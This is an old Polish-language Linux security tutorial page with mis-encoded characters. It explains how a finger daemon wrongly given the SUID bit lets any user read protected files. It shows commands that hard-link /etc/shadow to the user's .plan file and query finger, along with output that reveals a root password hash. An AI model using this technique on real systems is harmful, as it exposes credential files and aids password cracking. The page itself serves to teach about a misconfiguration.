 |
Bezpiecze±stwo system≤w Linux'owych |
|
Linux Security - Suidy
|
|
Finger
 |
| [1] [2] [3] [4] [5] |
|
|
B│Ωdna konfiguracja demona odpowiedzialnego za us│ugΩ finger (nadanie mu w│▒czonego
atrybutu SUID powoduje, ┐e mo┐e on odczytaµ dowolny plik. Ka┐dy u┐ytkownik ma
przyporz▒dkowany w swoim katalogu domowym plik .plan, kt≤ry mo┐e zawieraµ dodatkowe
informacje o u┐ytkowniku. Wystarczy powi▒zaµ go z odpowiednim plikiem i teraz odczytuj▒c
informacje o w│asnym sobie mo┐na odczytaµ zawarto╢µ pliku do kt≤rego nie mieli╢my przedtem
uprawnie±
|
[tronix@localhost]$ ln /etc/shadow .plan [tronix@localhost]$ finger tronix Login: tronix Name:Linux user Directory: /home/tronix Shell: /bin/bash On since Fri Mar 16 16:01 (CET) on tty3 No mail. Plan: root:zttJEkXo/9XCM:11389:0:99999:7::: bin:*:11389:0:99999:7::: daemon:*:11389:0:99999:7::: |
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved